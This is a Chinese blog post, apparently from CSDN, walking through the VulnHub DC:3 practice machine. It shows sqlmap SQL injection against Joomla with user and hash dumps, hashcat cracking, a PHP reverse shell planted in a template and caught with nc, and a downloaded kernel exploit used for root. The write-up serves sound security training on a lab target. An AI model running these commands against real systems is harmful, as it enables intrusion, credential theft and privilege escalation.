VulnHub DC:3

最新推荐文章于 2024-09-14 20:04:15 发布
最新推荐文章于 2024-09-14 20:04:15 发布
阅读量246 收藏 1
点赞数
分类专栏: VulnHub 文章标签: kali linux 安全 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43048653/article/details/110546077
版权

nmap扫描起手

nmap -sT 192.168.1.91 -p - -sV -O -sC

在这里插入图片描述
只开了80,上去看看。nmap 用脚本扫出了这是一个Joomla构建的网站。
在这里插入图片描述
信息很少,但至少知道一个账号admin。先用joomscan扫一下看看。
kali 中没有joomscan,去github上下载一下。
https://github.com/rezasp/joomscan

git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl -u 192.168.1.91

在这里插入图片描述
发现了管理后台页面,还有Joomla的版本。先看看这个版本有没有漏洞。
在这里插入图片描述
存在一个sql注入漏洞。看一下这个漏洞利用文件。

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

在这里插入图片描述
那就用sqlmap.

sqlmap -u "http://192.168.1.91/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

执行后返回,由于数据库登陆入口,先对joomladb数据库进行操作在这里插入图片描述
接下来是,把上面的–dbs 改成–tables -D joomladb指定数据库。
在这里插入图片描述
发现了几个user表。看一下users
-T users -D joomladb --columns
在这里插入图片描述
我没想到他没枚举出列名来。
我发现我前面的表名指定错了。。。。。。
再跑一次吧,哈。

sqlmap -u "http://192.168.1.91/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T '#__users' --column

在这里插入图片描述
果然安全是个细活。

sqlmap -u "http://192.168.1.91/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] -D joomladb -T '#__users' -C id,password,username --dump

在这里插入图片描述
用hash-identifier 无法识别,这串hash.hashcat -m 400 类型的joomla,提示长度不对。
最后我在https://hashcat.net/wiki/doku.php?id=example_hashes
找到一个类似格式的hash
在这里插入图片描述
保存hash值后破解。

hashcat -a 0 -m 3200 ./2.hash  /usr/share/wordlists/rockyou.txt

在这里插入图片描述
登陆后台看看。看看有没有上传代码或者执行代码的地方。
在joomal的后台中可以编辑模板的PHP代码。可以自行搜索 joomla shell。
在这里我们利用Beez3详细信息和文件之一
在这里插入图片描述
在这里插入图片描述
这里的话,选任何一个PHP页面都可以,关键是你要知道路径。
在这里插入图片描述这里的路径实际上是/templates/beez3/html/
如果不知道路径,可以用gobuster这样的工具去爆破目录。
上传反弹shell

/usr/share/webshells/php/php-reverse-shell.php

用kali自带的反弹shell
在这里插入图片描述

nc -lvp 4444

在这里插入图片描述
在这里插入图片描述
python升级shell

python -c "import pty;pty.spawn('/bin/bash')"

提权。
看来没有suid提权,也不能用su,sudo.
那看看内核吧。

uname -a
cat /etc/lsb-release

在这里插入图片描述

利用工具linux-exploit-suggester,枚举内核漏洞。
https://github.com/mzet-/linux-exploit-suggester
我kali机上以及下好了,所以建立一个web服务器,让靶机下载。

 python -m SimpleHTTPServer 80
 cp les.sh /var/www/html/

提示权限拒绝。换到/tmp目录就好了。
在这里插入图片描述
在这里插入图片描述

chmod +x les.sh

在这里插入图片描述
我选择了这个进行尝试。去下载他的poc
kali下载后我把他移动到web目录下进行下载。

unzip 39772.zip
cd 39772
tar -xvf exploit.tar

在这里插入图片描述
提示警告在doubleput.c,但实际上仍然是起作用的。
运行 ./doubleput
在这里插入图片描述
okok,我们现在是root
在这里插入图片描述
拿到flag。

spider.x
关注
专栏目录
Joomla!网站扫描工具joomscan
weixin_34362875的博客
07-27 599
2019独角兽企业重金招聘Python工程师标准>>> ...
DC-3靶机渗透
weixin_45349299的博客
01-02 583
title: DC-3靶机渗透详解tags: DC系列靶机categories: 学习笔记。
kali渗透之DC-3
余笙.'的博客
11-27 1083
kali渗透DC-3靶机
【工具使用】--- JoomScan工具简单使用
qq_43168364的博客
01-02 2730
1.简介 漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。该工具基于Perl开发,能够轻松无缝地对各种Joomla项目进行漏洞扫描,其轻量化和模块化的架构能够保证扫描过程中不会留下过多的痕迹。它不仅能够检测已知漏洞,而且还能够检测到很多错误配置漏洞和管理权限漏洞等等。还能够以HTML或文本格式导出扫描报告。 2.作用 自动化 版本枚举 漏洞枚举(基于版本) 组件枚举 组件漏洞枚举 防火墙检测 文本或HTML格式导出数据 查找常见日
DC-3靶机渗透测试详细教程
啊醒的博客
05-04 2136
DC-3靶机渗透测试详细教程
vulnhub 入门DC-3
weixin_52780973的博客
01-01 280
搜索对应CMS漏洞,存在sql注入漏洞,Joomla 3.7.0 Ubuntu16.04提权 SQLmap
VulnHub DC:5
spider的博客
12-06 218
靶机192.168.1.226 nmap起手。 nmap -sT -sV -o ./sC 192.168.1.226 -p -
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2509
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
VulnHub DC: 2 渗透测试
spider的博客
11-29 274
下载在虚拟机部署后 主机发现 flag1 nmap -sT -v 192.168.1.246 -sV -O -p- 我们在这发现开放了2个服务,直接访问80端口,发现重定向到域名/dc-2,去/etc/hosts 文件改一下就好。 打开页面,发现是一个wordpress的网站,发现flag1,提示用从cewl可以爬到密码 cewl http://dc-2 -w pwd.txt cat pwd.txt && wc -w pwd.txt cewl 密码长度可以指定的,得到一个238个密
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3023
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5950
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
Kali下的小工具的使用笔记
weixin_51339377的博客
04-24 1271
不会使用可以用程序 --help查看如何使用 域名信息搜集工具 1.dnsenum 域名搜集工具 会连接到一些引擎 比如google等 会猜测可能存在的域名 并查询相应的网段 对c段进行whois查询等 dnsenum --enum [域名地址] 2.fierce 对子域名扫描和搜集 很多是字典查询等 fierce --domain [目标域名] 3.snmpcheck 可以用于snmp服务的探测 snmpcheck -t [目标ip地址] ...
DC-3靶机的渗透学习
里丘~班诺的小屋
10-01 3293
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.133(未知) 靶机地址:https://www.vulnhub.com/entry/dc-32,312/ 二、战前准备 2.1IP地址确认 命令:arp-scan -l扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)它可以构造并发送ARP请求到指定的IP地址,...
WEB安全扫描软件=:joomscan
weixin_33858336的博客
02-02 317
Joomla security scanner可以检测Joomla整站程序搭建的网站是否存在文件包含、sql注入、命令执行等漏洞。joomscan -u url 转载于:https://blog.51cto.com/biock/1610625...
2024 年浙江省网络安全行业网络安全运维工程师项目 职业技能竞赛网络安全运维工程师(决赛样题)
Aluxian_的博客
09-13 869
作为一名网络安全运维工程师,你发现公司的内部网络出现了异常流量,多个关键应用程序的响应速度显著下降,你需要对网络流量进行深入分析,识别潜在的安全威胁,追踪可疑活动,以确保公司数据的安全性。
时间&安全精细化管理平台存在未授权访问漏洞
最新发布
2301_77012231的博客
09-14 413
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1210
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
远程跨境传输大文件如何做到安全又稳定?
镭速的博客
09-14 662
在当今全球化的商业环境中,企业跨境传输大文件的需求日益增长。这不仅涉及到数据的快速迁移,还包括了安全性、稳定性和合规性等多重挑战。本文将探讨企业在跨境传输大文件时可能遇到的问题,以及在传输过程中应注意的事项,并重点介绍镭速在方面的优势。
使用Let’s Encrypt 配置 SSL 证书去除浏览器不安全告警
舒一笑的博客
09-14 225
执行完上述命令之后会提示你输入一下自己的邮箱信息等等然后会给你两个TXT的值类型,需要将这两个值配置在你自己的云服务DNS解析中,我这里以阿里云DNS为例。配置解析值时候需要注意自己购买的云厂商的解析规则,例如这里阿里云DNS是默认会带上你的一级域名,因此在书写配置时候就不用写了。经过我的验证这边虽然是免费的ssl认证给你白嫖三个月,但是如果你上述解析配置正确的话还是认证发证书很快的。然后后续的话需要在nginx中配置自己的一下证书信息,下面展示一下我的nginx配置。使用命令查看一下证书文件是否存在。
VulnHub入门教程:DC-1靶场攻破指南
3. **基本渗透测试工具**:了解并能使用 Kali Linux 或 Parrot Security OS 提供的工具,如 Nmap(网络扫描)、Wireshark(网络嗅探)、John the Ripper(密码破解)、Burp Suite(HTTP代理)等。 4. **旗标寻找**...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值